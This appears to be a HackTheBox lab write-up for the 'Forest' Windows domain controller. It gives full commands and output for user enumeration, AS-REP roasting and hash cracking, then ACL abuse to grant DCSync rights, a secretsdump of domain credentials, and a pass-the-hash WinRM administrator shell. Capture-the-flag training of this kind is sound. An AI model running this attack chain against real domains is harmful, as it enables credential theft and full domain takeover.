Forest
Another HackTheBox AD box.
Enumeration:
Port Scanning:
First we will start with nmap to scan for open ports:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oN nmap/services.nmap -vv 10.129.95.210
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-03 04:54 EDT
Nmap scan report for 10.129.95.210
Host is up, received echo-reply ttl 127 (0.23s latency).
Scanned at 2025-09-03 04:54:27 EDT for 108s
Not shown: 65512 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-03 09:01:45Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
<snipped>
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
<snipped>
|_clock-skew: mean: 2h26m51s, deviation: 4h02m32s, median: 6m49sThe same open ports that indicate we are dealing with AD domain controller, dns on port 53, kerberos on port 88, smb on port 445, ldap ports, and we have winrm on port 5985, and the host name of the target machine is FOREST.
I will add the domain and the host name to the hosts file:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
<snipped>
10.129.95.210 FOREST.htb.local htb.local FORESTWe can see at the bottom of the nmap scan that the clock-skew is too great, so I will use ntpdate to sync it with the target host:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ sudo ntpdate 10.129.95.210If we tried smb null session/guest session:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ netexec smb 10.129.95.210 -u '' -p ''
SMB 10.129.95.210 445 FOREST [*] Windows 10 / Server 2016 Build 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB 10.129.95.210 445 FOREST [+] htb.local\:Guest account is disabled.
Lets enumerate the users via netexec but we can use other various tools such as impacket-lookupsid or even rpcclient:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ netexec smb 10.129.95.210 -u '' -p '' --users
SMB 10.129.95.210 445 FOREST [*] Windows 10 / Server 2016 Build 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB 10.129.95.210 445 FOREST [+] htb.local\:
SMB 10.129.95.210 445 FOREST -Username- -Last PW Set- -BadPW- -Description-
SMB 10.129.95.210 445 FOREST Administrator 2021-08-31 00:51:58 0 Built-in account for administering the computer/domain
SMB 10.129.95.210 445 FOREST Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.129.95.210 445 FOREST krbtgt 2019-09-18 10:53:23 0 Key Distribution Center Service Account
SMB 10.129.95.210 445 FOREST DefaultAccount <never> 0 A user account managed by the system.
<snipped>
SMB 10.129.95.210 445 FOREST sebastien 2019-09-20 00:29:59 0
SMB 10.129.95.210 445 FOREST lucinda 2019-09-20 00:44:13 0
SMB 10.129.95.210 445 FOREST svc-alfresco 2025-09-03 09:02:02 0
SMB 10.129.95.210 445 FOREST andy 2019-09-22 22:44:16 0
SMB 10.129.95.210 445 FOREST mark 2019-09-20 22:57:30 0
SMB 10.129.95.210 445 FOREST santi 2019-09-20 23:02:55 0
SMB 10.129.95.210 445 FOREST [*] Enumerated 31 local users: HTBI will add those users to a text file.
AS-REP Roasting:
Now I can try multiple attacks, such as password spraying, use the username as the password, or AS-REP Roasting:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ impacket-GetNPUsers htb.local/ -usersfile users.txt -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
<snipped>
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-alfresco@HTB.LOCAL:e73b60f4b56f1fe0a3f3ac784f529185$3eca9e381a0e88cb8c3a5f89dba8aaa117e36addf8aabaf41721abf9e392fba2ce4d4c75d234022d6f91c19e5b49f99e63dbf7
4963d696617b8b394167bf22935ecb18738d1399e628c156b3588d6920b38a69d767b5953794c579bad024081b2fd81d8e9b7cf1770e0ca873423c4d656b1f5245915fbbc26b487c1d75854637ce98fdc02cd6fe9497
766a5ecd6b0cbf77ce88cb91eaefc01b77be4538e1c4ac213a7b56ccebcffa164c3fe6826bac23084c8a822001d348c153a2e82a9b36489e5c4d1754349dcf8611e74410cc9251931ce3f47744dc52fc2b213e7cea7c
ce3b2a21290f13
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
<snipped>Here we can see that svc-alfresco user has do not require preauth option enabled.
Lets save this ticket into a file and attempt to crack it using hashcat:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ hashcat svc-alfresco.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
<snipped>
$krb5asrep$23$svc-alfresco@HTB.LOCAL:e73b60f4b56f1fe0a3f3ac784f529185$3eca9e381a0e88cb8c3a5f89dba8aaa117e36addf8aabaf41721abf9e392fba2ce4d4c75d234022d6f91c19e5b49f99e63dbf7
4963d696617b8b394167bf22935ecb18738d1399e628c156b3588d6920b38a69d767b5953794c579bad024081b2fd81d8e9b7cf1770e0ca873423c4d656b1f5245915fbbc26b487c1d75854637ce98fdc02cd6fe9497
766a5ecd6b0cbf77ce88cb91eaefc01b77be4538e1c4ac213a7b56ccebcffa164c3fe6826bac23084c8a822001d348c153a2e82a9b36489e5c4d1754349dcf8611e74410cc9251931ce3f47744dc52fc2b213e7cea7c
ce3b2a21290f13:s3rvice
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$svc-alfresco@HTB.LOCAL:e73b60f4b56f1f...290f13
Time.Started.....: Wed Sep 3 05:00:17 2025 (3 secs)
Time.Estimated...: Wed Sep 3 05:00:20 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1314.7 kH/s (0.86ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4085760/14344385 (28.48%)
Rejected.........: 0/4085760 (0.00%)
Restore.Point....: 4082688/14344385 (28.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: s6509511 -> s3r3ndipit
Hardware.Mon.#1..: Util: 27%
<snipped>Now we have valid domain user credentials htb.local/svc-alfresco:s3rvice.
BloodHound:
No interesting shares or user descriptions. So I will use netexec as the ingestor this time to collect the domain data:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ netexec ldap 10.129.95.210 -u svc-alfresco -p s3rvice --bloodhound -c all --dns-server 10.129.95.210
LDAP 10.129.95.210 389 FOREST [*] Windows 10 / Server 2016 Build 14393 (name:FOREST) (domain:htb.local)
LDAP 10.129.95.210 389 FOREST [+] htb.local\svc-alfresco:s3rvice
LDAP 10.129.95.210 389 FOREST Resolved collection methods: psremote, dcom, localadmin, session, container, acl, rdp, objectprops, trusts, group
LDAP 10.129.95.210 389 FOREST Done in 01M 01S
LDAP 10.129.95.210 389 FOREST Compressing output into /home/kali/.nxc/logs/FOREST_10.129.95.210_2025-09-03_060617_bloodhound.zipAnd I will open up bloodhound:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ sudo bloodhound
[sudo] password for kali:
Starting neo4j
Neo4j is not running.
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /etc/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:106093). It is available at http://localhost:7474
There may be a short delay until the server is ready.
................................................
Bloodhound will start
IMPORTANT: It will take time, please wait...
<snipped>
opening http://127.0.0.1:8080I will unzip the collected .zip file, and upload ingested data to bloodhound:
Mark svc-alfresco as owned:
Privilege Escalation:
I will navigate to cypher and try some queries to try to find any interesting attack paths.
We will find that svc-alfresco is member of the Remote Management Users which implies that we can WinRm to the target machine and read the user flag.
Abuse ACLs:
I clicked on shortest paths from owned objects, and saw this:
We can see that we are member of the account operators group, and interestingly account operators group has GenericAll over multiple objects in the domain, including the Exchange Windows Permissions group:
And that group has WriteDacl over the domain, which if I added svc-alfresco to that group, I can grant him DCSync rights.
Add svc-alfresco to that group using the command provided by bloodhound itself:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ net rpc group addmem "Exchange Windows Permissions" "svc-alfresco" -U "htb.local"/"svc-alfresco"%"s3rvice" -S "forest.htb.local"Check if the user has been added:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ net rpc group members "Exchange Windows Permissions" -U "htb.local"/"svc-alfresco"%"s3rvice" -S "forest.htb.local"
HTB\Exchange Trusted Subsystem
HTB\svc-alfrescoWe can see that we are member of that group, lets now grant ourselves DCSync rights using impacket-dacledit:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ impacket-dacledit -action 'write' -rights 'DCSync' -principal 'svc-alfresco' -target-dn 'DC=htb,DC=local' 'htb.local'/'svc-alfresco':'s3rvice'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit-20250903-061628.bak
[*] DACL modified successfully!And now with secretsdump we can perform the DCSync (Domain Controller Syncrhonization) attack:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ impacket-secretsdump htb.local/svc-alfresco:s3rvice@forest.htb.local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb****************:::
<snipped>
[*] Cleaning up...Here we have the ntlm hash of the domain administrator, lets authenticate via winrm:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Forest]
└─$ evil-winrm -i 10.129.95.210 -u administrator -H 32693b11e6aa90eb****************
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
htb\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
FOREST
*Evil-WinRM* PS C:\Users\Administrator\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::ccde:52fe:5f28:8ca7
Link-local IPv6 Address . . . . . : fe80::ccde:52fe:5f28:8ca7%5
IPv4 Address. . . . . . . . . . . : 10.129.95.210
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%5
10.129.0.1
Tunnel adapter isatap..htb:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : .htbHere also we can read the flags:
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\svc-alfresco\Desktop\user.txt
37338043b3f16983****************
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
39d59bca6dc4090c****************Last updated